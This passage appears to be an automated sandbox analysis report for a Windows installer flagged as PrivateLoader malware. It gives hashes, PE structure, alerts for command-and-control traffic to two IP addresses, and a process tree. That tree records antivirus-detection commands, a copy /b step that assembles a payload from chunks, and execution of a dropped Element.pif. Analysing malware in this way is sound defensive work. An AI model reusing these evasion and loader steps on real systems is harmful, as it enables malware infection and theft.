              SHA-512:C09C5B116F119EAD2699CFC4E7ED59C78DBA95A3E6577C05EB4B82D109C04FFB6029359150DDBD5B8DA860ED8A838C568EA845887AD0F298692FA51FA1348AC5
              Malicious:true
              Preview:.DS{.)."....-....I].GI|>..0m...,.n...".^.'...l../h....M.K/.W......+t....i..,..t.>&>l.C..{...p....7..."J.>3..... \.(.J.@.Q.\....Z2.7.Z\..;.g>.C...:#..2Y..}.3.C0.#f0\..<.lgxq.oU...@.........a?...m.k.._/W.c.&Rp..u.D=6......0.....R..0...|ra...ZA..l%G....o.....:....u;..*..R....LF!..z.s.f..4ha;.... .).@..........I...3.3fr.ei.(..8......wD...*7.../..C.L+g>.>.H.o...:...6.A/N.....`4V.i.U-..:...-\..DE.....i.wN.5...%V...y..n.....{......-...y...u...9.e...g>...O....D......<.;.0].a.7...o.%e`.......W..B..mZ...z.7..#..E.....*p.R.sf.6.W.J..o....m..B.:.7..N...q]......(...< ...Ur:.....~.....Q..hqP..~.d.KtT6r...).>.........s'....._...mf37.A>...3._....g.C8,V.gd.?i.!...Dx..........H-...9..z_..K..Mbw...:...P...`V4...>B..Q....:...V...b..>4.e...... ..........+`Ah+=j&{...[Z.,.+.2.[...3..VZ...K`.rW=g.+.._..h.7LM.6Ld.....b.]j...Y..~....mi..,1...}..o..o,...J..-...''.........(....$.._..7.$.....f..bo/........x.%....F..2.K......q|..R.....%..#..T...[mW....v)
              Process:C:\Users\user\Desktop\wWk9NkXYcL.exe
              File Type:data
              Category:dropped
              Size (bytes):69632
              Entropy (8bit):7.997491195832333
              Encrypted:true
              SSDEEP:1536:ZnumNW06s8Mpi4iczEBjV2AHKhB1otCRMamawqa2hLyWq:gIWzYi4iczER9HK1ECRdmawrgLE
              MD5:8EB31452FC71D6705F49585FB70A99B1
              SHA1:7EC047C13954774C901A071B2A6785B8CB6941C9
              SHA-256:26B595C679D843BD50CE39C6DE1CFFC5BAABD595B66EC0686BE9A905A38777CB
              SHA-512:5FCC7E47317A4EDAE29B39E5FA1002778AE82BF02D4A97EE298A4F028CF02CE183D02F14B55FEB867D9350F1C81B62E643FF651D260167E58ABFE5D4DB07FBAF
              Malicious:true
              Preview:|....x&....P>..<.%..@.`..(h.6...4...P.(|.a(]..=.M3..UI..X..Ic<._A|..2...+...e.y...E*..2f.&....-..Q..@K.z.s..w.&6...5..{.WX....F....Uj..l0.4...:.7..S..s}Ns..b.X.....#...;.g...z.x$..?.....5T...).......y^7.O..]/.^K....{^...H.6i..;qW=..-}.'.....HL.r....i4..<.....`.uR6.e*.m..~.I..=...q.-.+R.4C.AUJT}].A..Z/..r.'[9..gyt.... .'kt........Z.cx....`...m...\..[{)E.1.i.g.~U*.nlxW$...&.7./G7%....;2f`..U@...NW.!..]...8....^m&6&l..>.....Wru.:..._..[...M8...U...&Zz_.../...K.I.....}.&m^~./k..:P..dn.+F3v.tp...........k.V...N...#.OY\8)F.T@..m=.;.....h-...D..I.4).S.%.t9K....1;"W.:A......^.....r....>.|.Q4^$"...............v.!.+f..*<.3..........<.d......Pj\.."..a..+.#.z.5..r......3Fe.M......z#.u..*.U...Px.i.ba..(....1|..?.hJ.jj-..J..V.2....!.y.........[Pb.zU..0..U1....z..{/.'...Dr.6.7..h..D..../;] b$..L.s...tr..?..b4....w.....t.P;.1b...EQ.............z()..n%u-..l......m[).Q.L.=..Y..;.{8A.."^...I.`...PZ.HI..J.....|....$3..OG..%$0.<}z.j2..mlmZ.]q!5.w..I..
              Process:C:\Users\user\Desktop\wWk9NkXYcL.exe
              File Type:data
              Category:dropped
              Size (bytes):81920
              Entropy (8bit):7.997727452482501
              Encrypted:true
              SSDEEP:1536:uDsBS/pORcHC9k95vSjC4qQ7EKpq1kt78wPMmoNqau1Nq5RvGO1bN9PzJHHe5:u/OR+dKxq1ktA/VNyTqPvGO1bN9PzJs
              MD5:98299EB5E90AA1A7D6CF5BDB829E3872
              SHA1:081ED2D78FA1D4BB8FD8F31F861323DAD5534C49
              SHA-256:A1050FBFF70B206021A797773F9ACC047B3151DC52EF3BED10D6B28AE7C66554
              SHA-512:44215DCC775A5C0E3BF654D2052C73085D5AC168032C2813382EAA87EBC919160E905AB132BF483257FE62D89C86B40FDC46EA782EF5FCF26C45F77AD5D4C5A1
              Malicious:true
              Preview:.>......Qd/6l.Uk..d..wS.P..k0..r....N....y[.*.F...L....;...J..b.W......24P...y..F.e.h ........P...<g..*..Ku.....M.....[.i.G........O....g.-....B......s...^.@1..6....*.TN.....@..U....Z..]....D..D.._y../..t..J....V%aH.3E.E.&.x...q...PT.b&.|.....m.`f].=....k......d..1>..W....o..n#...^!q%.Q.;].Y..5....q...".....R.(}.m...3.]...0O.Y......6N.;..d....X.8......(s....~CPk...9...OU..a.#G..B.]..Zu.@.2@N..Y..{|W..y2..W........!4[.N..e.b:....B...}6....'.B....HB..=.s.?...X..~....,..(n.z......?....A./]^TP...pAd.J...)+..k..F...h.b..ZB.r.0........D.....c}N..@.]...V..4IC.......}.7Z......#..g..3<...C..a}R~....j...$....nQs.X..n...X...Y.V....'P...Sq..**..x...w.#..jx%+a...Rp.i..A.H..R....\m...F.G%...l.K..\.7SWfG.:.........,.....&~........>.2_..1"...n.....Y.S..v*...[&./..Fn........3>i....c..../+e..v.....N8.C...-.+.x2.,3..*......M~I3.v..'...2W[]KC...)...A9..*..dS......#....,|.Z.}[...7.a.G...}^.E^.S .Sf.R.....g.B.gL......'E..a...K.c.u.......yiO..vi...r.e<.l
              Process:C:\Users\user\Desktop\wWk9NkXYcL.exe
              File Type:data
              Category:dropped
              Size (bytes):54272
              Entropy (8bit):7.996646849887946
              Encrypted:true
              SSDEEP:1536:Bzl18XkLg9MM/YOQYe/+EPgxvh7AB8nEt:1Lg9Mk1e/+E4z7Ab
              MD5:F87009BFB39149D32AF82E0146CDE3B7
              SHA1:C4FAED10F201924FE6A30B9C6AE42265B943D424
              SHA-256:FC8E5A71410CDA9E50E18B3A2080C6391A36ED4C26AFFA1AC178C44C97C1B65B
              SHA-512:B5EF875C716F739B508D3315A67C2053C0D8C5AE2F818A1C2E53DB7BB1CF086636C4DB1F7116FA43C2790BE06B7C307A86F530C4C479A8EEEF74DC35219845E0
              Malicious:true
              Preview:../#...I.........0_~.Q......].BP....s..i..v....C.......73..&!.....`.M.v.V.D;...MQ....v.w?wZ.He....D.S..I._*@..z.m.D....B.w.6./e.i@ux....8..Ka.G..&t!...,....-..9....Zt...8O.]..9......Iv...K.......-..o..........i...|....D...7BfVV` .UmlT4..q>..5..;J5....0$..A2^....3Nv(...c..=O.1..!x. ..<H5AC.>.......V....!....:.=:Hbeq.-.F.u$%&..._.H."...2.af,.K(..VO.`...2..i.I23!!.).OEW>....)..yGMK.>...... .4..*Zy...>!...`e.....".+1....u.W 1....@D..Y.h.f)...P.~G.H.}Qn..$8..f.....D.b..#..7.....t.T..1L.0I7....S.79....Z...1.{.q.I..;.<......6LU.z..@.g/..v ......S..&....o..8.......}=..../...~.R.Sw.Y..8...."..]......,.qM.@>..!@...>....D+h.w.sZ+.a<..'.(....1.........&.B....g..?.....v<.J..:...d:z.; ..c.j7Q..|r........4......hh.:$..6k"..?..5}EFg.o...P..Wa.A.kBMo..$f....8...IJ....i.4..{.-...x.;..bJt..<Q....nP..].3;.....,......s....~...A.:.t...lc..d...kR......B../VX.$.`.".>.}...).>..q.L..xq....3mBO?.y..Hd.Gu....5.....> I.Y.7...I..|.k..5(+..@...Q.....y..W....D.
              Process:C:\Users\user\Desktop\wWk9NkXYcL.exe
              File Type:data
              Category:dropped
              Size (bytes):76800
              Entropy (8bit):7.997267792102631
              Encrypted:true
              SSDEEP:1536:x1C2pHGCprwRfp/ise1pbGp+7EKp+8/Rst4XREh+3dxMsNoyvBhelpZCx:FdGCWRYse1pqOEKpTZBhEh+vNo+hI2x
              MD5:54DD729C1B5F4E3588FE8552FCC661E8
              SHA1:FF83067BCE2D5D57A6CD5731992196043B42DDA7
              SHA-256:4C05689E573BFEFA7473996F77C0BA935650CC7D361A38A4BA889432866B7D7D
              SHA-512:D7192A9ADF72C1789476B1BF44BF7ADA47BA1E29649E23B4B6B838F9FE984EC3C3D82CF569E3D1C6AC640D1FAF16FAFD466C3079853670248C611FCD060D8771
              Malicious:true
              Preview:i.j..N'.7..zm.^.u.|..5...-.lAsO..........G..X.. <...f...Ps.?|.%(eBwR ..../..g....3......r.....H.l...q.FV`.f+4~$.><n6..i_.n....]..S..=..%P......=.<.....E*.z.X...JNES....Gs2n.. &.5.a....6..S.y..L..v...t.ya.1lA...7....<.D......f.6$F.t0...u.....Z......C.....?.r....0{.....p.D3tmE.@(.l=..| .wm+.Q.h...m...g.:Z.n..l..=......z......5.........Q.i.[f...f.....y5.7f...wx.2.$.c.3.>E0.9..2.b#..?..x.N....L/..S.Tl.&|....z.|.|.,..S..M..<{......)..no....:.......7Gt..!....].pm9.q...N.^.....A.N.....xk...A...{. .'...;E?]..sCI....d...n...............w.l.pE..i>.>.@i.$(...#`).h6|<EmNI.P..gc$..b...\..F.z".U..........KS.N(.Sx.....D%.xe7.$.!3.s%\n..n...P.=v.)......$..P.r.{.. .q/[.@.`GY.% .>....o..x....r..2..nM......TXE....!.Y...!.$O.N...<.`.,.....v....~dQO....Q...F...Z.r.v..j..\...R(^[.......S.]..-.....?......T.1EQ...k......X.W.r...H....]...]2.e.Lw..R......|..LRug.)W.L......... .%i.\...$rzo.........N...n..Ag!... W.F.;..<0......._..i>...ea.;....$.z.V...h..E.
              File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
              Entropy (8bit):7.30838613676383
              TrID:
              • Win32 Executable (generic) a (10002005/4) 99.83%
              • Windows Screen Saver (13104/52) 0.13%
              • Generic Win/DOS Executable (2004/3) 0.02%
              • DOS Executable Generic (2002/1) 0.02%
              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
              File name:wWk9NkXYcL.exe
              File size:23'265'280 bytes
              MD5:3a1ccc44a0aa6f397c3b2eacf6d4c526
              SHA1:62d0b00435893cae171ddf6b2b5d964f608db84e
              SHA256:e606e3e72dfaabb3b398d7f7b2b221675038da19080c69c41bd3005066d94f50
              SHA512:4373ae343d6f6c4f84359f8d879a6d4b1275e9245762fc592ef7feace7257b95843775c13c48f8d1a2abdeaf8449f5f4103938fc2527fac26efbb316968b3b08
              SSDEEP:196608:Z8VG/O42OzpufDGQVegTH0DdR4gTH0DdR4gTH0DdR4gTH0DdR4gTH0DdR4gTH0Ds:Z8EOVGpiFVgQQQQQQ
              TLSH:FA372393C32708B1F57D903A08B6BA338E2E55DF7221959A67CF0BFFB149EC5059A424
              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......<.ydx..7x..7x..7_Hz7{..7_Hl7i..7x..7...7q..7s..7q..7y..7q..7y..7Richx..7........................PE..L....l.K.................h.
              Icon Hash:6062e0e2d8c4fc08
              Entrypoint:0x403415
              Entrypoint Section:.text
              Digitally signed:true
              Imagebase:0x400000
              Subsystem:windows gui
              Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
              DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE
              Time Stamp:0x4BC06CDA [Sat Apr 10 12:19:38 2010 UTC]
              TLS Callbacks:
              CLR (.Net) Version:
              OS Version Major:5
              OS Version Minor:0
              File Version Major:5
              File Version Minor:0
              Subsystem Version Major:5
              Subsystem Version Minor:0
              Import Hash:bf95d1fc1d10de18b32654b123ad5e1f
              Signature Valid:
              Signature Issuer:
              Signature Validation Error:
              Error Number:
              Not Before, Not After
                Subject Chain
                  Version:
                  Thumbprint MD5:
                  Thumbprint SHA-1:
                  Thumbprint SHA-256:
                  Serial:
                  Instruction
                  sub esp, 000002D4h
                  push ebx
                  push ebp
                  push esi
                  push edi
                  push 00000020h
                  xor ebp, ebp
                  pop esi
                  mov dword ptr [esp+18h], ebp
                  mov dword ptr [esp+10h], 00408570h
                  mov dword ptr [esp+14h], ebp
                  call dword ptr [00408030h]
                  push 00008001h
                  call dword ptr [004080B4h]
                  push ebp
                  call dword ptr [004082B0h]
                  push 00000008h
                  mov dword ptr [0047B398h], eax
                  call 00007F7668EECC6Ch
                  push ebp
                  push 000002B4h
                  mov dword ptr [0047B2B0h], eax
                  lea eax, dword ptr [esp+38h]
                  push eax
                  push ebp
                  push 0040856Ch
                  call dword ptr [00408180h]
                  push 00408554h
                  push 004732A0h
                  call 00007F7668EECB3Ah
                  call dword ptr [004080B0h]
                  push eax
                  mov edi, 004CC0A0h
                  push edi
                  call 00007F7668EECB28h
                  push ebp
                  call dword ptr [00408130h]
                  cmp word ptr [004CC0A0h], 0022h
                  mov dword ptr [0047B2B8h], eax
                  mov eax, edi
                  jne 00007F7668EEA50Ah
                  push 00000022h
                  pop esi
                  mov eax, 004CC0A2h
                  push esi
                  push eax
                  call 00007F7668EEC7FCh
                  push eax
                  call dword ptr [00408250h]
                  mov esi, eax
                  mov dword ptr [esp+1Ch], esi
                  jmp 00007F7668EEA591h
                  push 00000020h
                  pop ebx
                  cmp ax, bx
                  jne 00007F7668EEA509h
                  inc esi
                  inc esi
                  cmp word ptr [esi], bx
                  je 00007F7668EEA4FBh
                  Programming Language:
                  • [ C ] VS2005 build 50727
                  • [IMP] VS2005 build 50727
                  • [ C ] VS2008 SP1 build 30729
                  • [LNK] VS2008 SP1 build 30729
                  NameVirtual AddressVirtual Size Is in Section
                  IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                  IMAGE_DIRECTORY_ENTRY_IMPORT0x8afc0xb4.rdata
                  IMAGE_DIRECTORY_ENTRY_RESOURCE0xfd0000x4a168.rsrc
                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                  IMAGE_DIRECTORY_ENTRY_SECURITY0x2e79020x31c0
                  IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                  IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                  IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                  IMAGE_DIRECTORY_ENTRY_IAT0x80000x2c0.rdata
                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                  NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                  .text0x10000x671c0x68008bb8f6dca80ad27cbdbce9816ab6ae7cFalse0.6644381009615384data6.50478910452928IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  .rdata0x80000x19d60x1a00161b329b4c70ce4fbd9c1143e738896bFalse0.4480168269230769data5.026839717718007IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                  .data0xa0000x7139c0x200140876ba314e7bc36379ee5c6db80876False0.271484375data1.7360077526852977IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  .ndata0x7c0000x810000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                  .rsrc0xfd0000x4a1680x4a2006045c79daf0df2fcc23695e835aa8ed3False0.14129360771500843data3.8002785037819753IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                  NameRVASizeTypeLanguageCountryZLIB Complexity
                  RT_ICON0xfd2080x44028Device independent bitmap graphic, 256 x 512 x 32, image size 278528EnglishUnited States0.11365627064127969
                  RT_ICON0x1412300x5638Device independent bitmap graphic, 72 x 144 x 32, image size 22032EnglishUnited States0.4416908300108735
                  RT_DIALOG0x1468680x100dataEnglishUnited States0.5234375
                  RT_DIALOG0x1469680x11cdataEnglishUnited States0.6056338028169014
                  RT_DIALOG0x146a880x60dataEnglishUnited States0.7291666666666666
                  RT_GROUP_ICON0x146ae80x22dataEnglishUnited States0.9411764705882353
                  RT_VERSION0x146b100x380dataEnglishUnited States0.4419642857142857
                  RT_MANIFEST0x146e900x2d6XML 1.0 document, ASCII text, with very long lines (726), with no line terminatorsEnglishUnited States0.5647382920110193
                  DLLImport
                  KERNEL32.dllSetFileTime, CompareFileTime, SearchPathW, GetShortPathNameW, GetFullPathNameW, MoveFileW, SetCurrentDirectoryW, GetFileAttributesW, GetLastError, CreateDirectoryW, SetFileAttributesW, Sleep, GetTickCount, GetFileSize, GetModuleFileNameW, GetCurrentProcess, CopyFileW, ExitProcess, GetWindowsDirectoryW, GetTempPathW, GetCommandLineW, SetErrorMode, lstrcpynA, CloseHandle, lstrcpynW, GetDiskFreeSpaceW, GlobalUnlock, GlobalLock, CreateThread, LoadLibraryW, CreateProcessW, lstrcmpiA, CreateFileW, GetTempFileNameW, lstrcatW, GetProcAddress, LoadLibraryA, GetModuleHandleA, OpenProcess, lstrcpyW, GetVersionExW, GetSystemDirectoryW, GetVersion, lstrcpyA, RemoveDirectoryW, lstrcmpiW, lstrcmpW, ExpandEnvironmentStringsW, GlobalAlloc, WaitForSingleObject, GetExitCodeProcess, GlobalFree, GetModuleHandleW, LoadLibraryExW, FreeLibrary, WritePrivateProfileStringW, GetPrivateProfileStringW, WideCharToMultiByte, MulDiv, lstrlenA, WriteFile, ReadFile, MultiByteToWideChar, SetFilePointer, FindClose, FindNextFileW, FindFirstFileW, DeleteFileW, lstrlenW
                  USER32.dllScreenToClient, GetMessagePos, CallWindowProcW, IsWindowVisible, LoadBitmapW, CloseClipboard, SetClipboardData, EmptyClipboard, OpenClipboard, TrackPopupMenu, GetWindowRect, AppendMenuW, CreatePopupMenu, GetSystemMetrics, EndDialog, EnableMenuItem, GetSystemMenu, SetClassLongW, IsWindowEnabled, SetWindowPos, DialogBoxParamW, CheckDlgButton, CreateWindowExW, SystemParametersInfoW, RegisterClassW, SetDlgItemTextW, GetDlgItemTextW, MessageBoxIndirectW, CharNextA, CharUpperW, CharPrevW, DispatchMessageW, PeekMessageW, wsprintfA, DestroyWindow, CreateDialogParamW, SetTimer, SetWindowTextW, PostQuitMessage, SetForegroundWindow, ShowWindow, wsprintfW, SendMessageTimeoutW, LoadCursorW, SetCursor, GetWindowLongW, GetSysColor, CharNextW, GetClassInfoW, ExitWindowsEx, FindWindowExW, GetDlgItem, SetWindowLongW, LoadImageW, GetDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, GetClientRect, FillRect, DrawTextW, EndPaint, IsWindow
                  GDI32.dllSetBkColor, GetDeviceCaps, DeleteObject, CreateBrushIndirect, CreateFontIndirectW, SetBkMode, SetTextColor, SelectObject
                  SHELL32.dllSHBrowseForFolderW, SHGetPathFromIDListW, SHGetFileInfoW, ShellExecuteW, SHFileOperationW, SHGetSpecialFolderLocation
                  ADVAPI32.dllRegEnumKeyW, RegOpenKeyExW, RegCloseKey, RegDeleteKeyW, RegDeleteValueW, RegCreateKeyExW, RegSetValueExW, RegQueryValueExW, RegEnumValueW
                  COMCTL32.dllImageList_AddMasked, ImageList_Destroy, ImageList_Create
                  ole32.dllCoTaskMemFree, OleInitialize, OleUninitialize, CoCreateInstance
                  VERSION.dllGetFileVersionInfoSizeW, GetFileVersionInfoW, VerQueryValueW
                  Language of compilation systemCountry where language is spokenMap
                  EnglishUnited States
                  TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                  2024-09-12T21:26:46.244720+02002054709ET MALWARE PrivateLoader CnC Activity (GET)1192.168.2.749704195.10.205.4880TCP
                  2024-09-12T21:26:54.244678+02002054709ET MALWARE PrivateLoader CnC Activity (GET)1192.168.2.749705193.233.232.8680TCP
                  TimestampSource PortDest PortSource IPDest IP
                  Sep 12, 2024 21:26:38.273044109 CEST4970480192.168.2.7195.10.205.48
                  Sep 12, 2024 21:26:38.356275082 CEST8049704195.10.205.48192.168.2.7
                  Sep 12, 2024 21:26:38.356380939 CEST4970480192.168.2.7195.10.205.48
                  Sep 12, 2024 21:26:38.356565952 CEST4970480192.168.2.7195.10.205.48
                  Sep 12, 2024 21:26:38.361618042 CEST8049704195.10.205.48192.168.2.7
                  Sep 12, 2024 21:26:46.244719982 CEST4970480192.168.2.7195.10.205.48
                  Sep 12, 2024 21:26:46.248982906 CEST4970580192.168.2.7193.233.232.86
                  Sep 12, 2024 21:26:46.417675972 CEST8049705193.233.232.86192.168.2.7
                  Sep 12, 2024 21:26:46.417779922 CEST4970580192.168.2.7193.233.232.86
                  Sep 12, 2024 21:26:46.417933941 CEST4970580192.168.2.7193.233.232.86
                  Sep 12, 2024 21:26:46.422954082 CEST8049705193.233.232.86192.168.2.7
                  Sep 12, 2024 21:26:54.244678020 CEST4970580192.168.2.7193.233.232.86
                  TimestampSource PortDest PortSource IPDest IP
                  Sep 12, 2024 21:26:09.224596977 CEST5868753192.168.2.71.1.1.1
                  Sep 12, 2024 21:26:09.246236086 CEST53586871.1.1.1192.168.2.7
                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                  Sep 12, 2024 21:26:09.224596977 CEST192.168.2.71.1.1.10x3293Standard query (0)aSrgKXZxBg.aSrgKXZxBgA (IP address)IN (0x0001)false
                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                  Sep 12, 2024 21:26:09.246236086 CEST1.1.1.1192.168.2.70x3293Name error (3)aSrgKXZxBg.aSrgKXZxBgnonenoneA (IP address)IN (0x0001)false
                  • 195.10.205.48
                  • 193.233.232.86
                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  0192.168.2.749704195.10.205.48806196C:\Users\user\AppData\Local\Temp\473638\Element.pif
                  TimestampBytes transferredDirectionData
                  Sep 12, 2024 21:26:38.356565952 CEST219OUTGET /api/crazyfish.php HTTP/1.1
                  Connection: Keep-Alive
                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36 Edg/127.0.0.0
                  Host: 195.10.205.48


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  1192.168.2.749705193.233.232.86806196C:\Users\user\AppData\Local\Temp\473638\Element.pif
                  TimestampBytes transferredDirectionData
                  Sep 12, 2024 21:26:46.417933941 CEST220OUTGET /api/crazyfish.php HTTP/1.1
                  Connection: Keep-Alive
                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36 Edg/127.0.0.0
                  Host: 193.233.232.86


                  Click to jump to process

                  Click to jump to process

                  Click to dive into process behavior distribution

                  Click to jump to process

                  Target ID:0
                  Start time:15:26:05
                  Start date:12/09/2024
                  Path:C:\Users\user\Desktop\wWk9NkXYcL.exe
                  Wow64 process (32bit):true
                  Commandline:"C:\Users\user\Desktop\wWk9NkXYcL.exe"
                  Imagebase:0x400000
                  File size:23'265'280 bytes
                  MD5 hash:3A1CCC44A0AA6F397C3B2EACF6D4C526
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:low
                  Has exited:true

                  Target ID:2
                  Start time:15:26:05
                  Start date:12/09/2024
                  Path:C:\Windows\SysWOW64\cmd.exe
                  Wow64 process (32bit):true
                  Commandline:"C:\Windows\System32\cmd.exe" /k move Emotions Emotions.cmd & Emotions.cmd & exit
                  Imagebase:0x410000
                  File size:236'544 bytes
                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:high
                  Has exited:true

                  Target ID:3
                  Start time:15:26:05
                  Start date:12/09/2024
                  Path:C:\Windows\System32\conhost.exe
                  Wow64 process (32bit):false
                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Imagebase:0x7ff75da10000
                  File size:862'208 bytes
                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:high
                  Has exited:true

                  Target ID:4
                  Start time:15:26:06
                  Start date:12/09/2024
                  Path:C:\Windows\SysWOW64\tasklist.exe
                  Wow64 process (32bit):true
                  Commandline:tasklist
                  Imagebase:0xa00000
                  File size:79'360 bytes
                  MD5 hash:0A4448B31CE7F83CB7691A2657F330F1
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:moderate
                  Has exited:true

                  Target ID:5
                  Start time:15:26:06
                  Start date:12/09/2024
                  Path:C:\Windows\SysWOW64\findstr.exe
                  Wow64 process (32bit):true
                  Commandline:findstr /I "wrsa.exe opssvc.exe"
                  Imagebase:0x560000
                  File size:29'696 bytes
                  MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:moderate
                  Has exited:true

                  Target ID:6
                  Start time:15:26:07
                  Start date:12/09/2024
                  Path:C:\Windows\SysWOW64\tasklist.exe
                  Wow64 process (32bit):true
                  Commandline:tasklist
                  Imagebase:0xa00000
                  File size:79'360 bytes
                  MD5 hash:0A4448B31CE7F83CB7691A2657F330F1
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:moderate
                  Has exited:true

                  Target ID:7
                  Start time:15:26:07
                  Start date:12/09/2024
                  Path:C:\Windows\SysWOW64\findstr.exe
                  Wow64 process (32bit):true
                  Commandline:findstr /I "avastui.exe avgui.exe bdservicehost.exe ekrn.exe nswscsvc.exe sophoshealth.exe"
                  Imagebase:0x560000
                  File size:29'696 bytes
                  MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:moderate
                  Has exited:true

                  Target ID:10
                  Start time:15:26:07
                  Start date:12/09/2024
                  Path:C:\Windows\SysWOW64\cmd.exe
                  Wow64 process (32bit):true
                  Commandline:cmd /c md 473638
                  Imagebase:0x410000
                  File size:236'544 bytes
                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:high
                  Has exited:true

                  Target ID:11
                  Start time:15:26:07
                  Start date:12/09/2024
                  Path:C:\Windows\SysWOW64\findstr.exe
                  Wow64 process (32bit):true
                  Commandline:findstr /V "MaskBathroomCompositionInjection" Participants
                  Imagebase:0x560000
                  File size:29'696 bytes
                  MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:moderate
                  Has exited:true

                  Target ID:14
                  Start time:15:26:07
                  Start date:12/09/2024
                  Path:C:\Windows\SysWOW64\cmd.exe
                  Wow64 process (32bit):true
                  Commandline:cmd /c copy /b ..\They + ..\Florence + ..\Astrology + ..\Attributes + ..\Connect + ..\This + ..\Residents + ..\Staff + ..\Net + ..\Funded + ..\Laughing + ..\Reviewing + ..\Bullet + ..\Amendment + ..\Notre + ..\Beside + ..\Hc + ..\Heavily + ..\Spirit + ..\Contribution + ..\Dictionaries + ..\Simply + ..\Infants + ..\Music + ..\Right + ..\Fox + ..\Firewall + ..\Mint Q
                  Imagebase:0x410000
                  File size:236'544 bytes
                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:high
                  Has exited:true

                  Target ID:17
                  Start time:15:26:08
                  Start date:12/09/2024
                  Path:C:\Users\user\AppData\Local\Temp\473638\Element.pif
                  Wow64 process (32bit):false
                  Commandline:Element.pif Q
                  Imagebase:0x7ff6c5870000
                  File size:1'065'128 bytes
                  MD5 hash:C63860691927D62432750013B5A20F5F
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Antivirus matches:
                  • Detection: 0%, ReversingLabs
                  Reputation:low
                  Has exited:true

                  Target ID:18
                  Start time:15:26:08
                  Start date:12/09/2024
                  Path:C:\Windows\SysWOW64\choice.exe
                  Wow64 process (32bit):true
                  Commandline:choice /d y /t 5
                  Imagebase:0xd00000
                  File size:28'160 bytes
                  MD5 hash:FCE0E41C87DC4ABBE976998AD26C27E4
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Reputation:moderate
                  Has exited:true

                  Target ID:21
                  Start time:16:57:18
                  Start date:12/09/2024
                  Path:C:\Users\user\AppData\Local\Temp\473638\Element.pif
                  Wow64 process (32bit):false
                  Commandline:C:\Users\user~1\AppData\Local\Temp\473638\Element.pif
                  Imagebase:0x7ff6c5870000
                  File size:1'065'128 bytes
                  MD5 hash:C63860691927D62432750013B5A20F5F
                  Has elevated privileges:false
                  Has administrator privileges:false
                  Programmed in:C, C++ or other language
                  Has exited:false

                  Target ID:25
                  Start time:16:57:40
                  Start date:12/09/2024
                  Path:C:\Windows\System32\WerFault.exe
                  Wow64 process (32bit):false
                  Commandline:C:\Windows\system32\WerFault.exe -u -p 6196 -s 692
                  Imagebase:0x7ff7350b0000
                  File size:570'736 bytes
